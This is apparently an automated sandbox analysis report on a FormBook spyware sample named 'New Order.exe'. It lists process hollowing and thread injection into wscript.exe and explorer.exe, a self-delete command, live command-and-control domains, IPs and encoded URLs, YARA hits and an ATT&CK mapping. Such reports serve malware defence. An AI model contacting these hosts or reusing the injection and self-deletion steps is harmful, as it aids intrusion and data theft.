          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C18E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C9FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05483D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054F3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05467D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0546C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0546C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05518D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0550E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0544AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05474D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05474D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05474D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0545D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0545D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0550FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0550FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0550FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0550FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05472581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05472581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05472581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05472581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05442D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05442D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05442D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05442D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05442D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05471DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05471DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05471DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_055105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_055105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0546746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0551740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0551740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0551740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05518CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_055014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0545849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0545EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0545FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05518F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0546F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0551070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0551070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 192.155.181.250 80
          Source: C:\Windows\explorer.exeDomain query: www.ayanmobile.com
          Source: C:\Windows\SysWOW64\wscript.exeDomain query: www.ty-valve.com
          Source: C:\Windows\explorer.exeDomain query: www.cuttingemporium.com
          Source: C:\Windows\explorer.exeDomain query: www.securenotifications.com
          Source: C:\Windows\explorer.exeDomain query: www.collectordrive.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.209.88.35 80
          Source: C:\Windows\explorer.exeDomain query: www.dietsz.com
          Source: C:\Windows\explorer.exeDomain query: www.optimismactivism.com
          Source: C:\Windows\explorer.exeDomain query: www.gangju123.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.161.23.204 80
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.78.1 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\New Order.exeSection loaded: unknown target: C:\Users\user\Desktop\New Order.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\New Order.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\New Order.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\New Order.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\New Order.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\New Order.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\New Order.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: DF0000
          Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New Order.exe'
          Source: explorer.exe, 00000003.00000000.668700354.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000003.00000000.670473260.0000000001080000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.901778690.0000000003CE0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.670473260.0000000001080000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.901778690.0000000003CE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.670473260.0000000001080000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.901778690.0000000003CE0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.670473260.0000000001080000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.901778690.0000000003CE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.660941932.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery131Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 438531 Sample: New Order.exe Startdate: 22/06/2021 Architecture: WINDOWS Score: 100 34 www.occasionalassistant.com 2->34 36 occasionalassistant.com 2->36 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 7 other signatures 2->62 9 explorer.exe 2->9         started        13 New Order.exe 19 2->13         started        signatures3 process4 dnsIp5 38 www.ty-valve.com 192.155.181.250, 80 TELECOM-HKHongKongTelecomGlobalDataCentreHK United States 9->38 40 www.securenotifications.com 35.209.88.35, 49778, 80 GOOGLE-2US United States 9->40 42 11 other IPs or domains 9->42 64 System process connects to network (likely due to code injection or exploit) 9->64 16 wscript.exe 12 9->16         started        26 C:\Users\user\AppData\Local\Temp\vsfjb, DOS 13->26 dropped 28 C:\Users\user\AppData\Local\...\System.dll, PE32 13->28 dropped 66 Maps a DLL or memory area into another process 13->66 20 New Order.exe 13->20         started        file6 signatures7 process8 dnsIp9 30 www.ty-valve.com 16->30 32 192.168.2.1 unknown unknown 16->32 44 System process connects to network (likely due to code injection or exploit) 16->44 46 Modifies the context of a thread in another process (thread injection) 16->46 48 Maps a DLL or memory area into another process 16->48 50 Tries to detect virtualization through RDTSC time measurements 16->50 22 cmd.exe 1 16->22         started        52 Sample uses process hollowing technique 20->52 54 Queues an APC in another process (thread injection) 20->54 signatures10 process11 process12 24 conhost.exe 22->24         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          New Order.exe37%ReversingLabsWin32.Spyware.Noon
          New Order.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nssD6D3.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nssD6D3.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\vsfjb2%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.New Order.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          5.2.wscript.exe.34180a8.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.2.wscript.exe.5957960.6.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.0.New Order.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.New Order.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          2.1.New Order.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.New Order.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.New Order.exe.22a0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.collectordrive.com/de52/?z6Ad_8Jp=q/8Nbvd67YPMVz3o7HcOnLFi8lrYmwA47pjKffLVRoseAGTrTNs7CZxo0gnZJZCgi/pT&Yz=0bpDyT0%Avira URL Cloudsafe
          www.achainz.com/de52/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.cuttingemporium.com/de52/?z6Ad_8Jp=A6XO+ITKnQQbOEvUMrF2CVYLPv45kLd/uv2YdfW9vEZfPW6611dfa85KEkC5Wqh6gBNa&Yz=0bpDyT0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
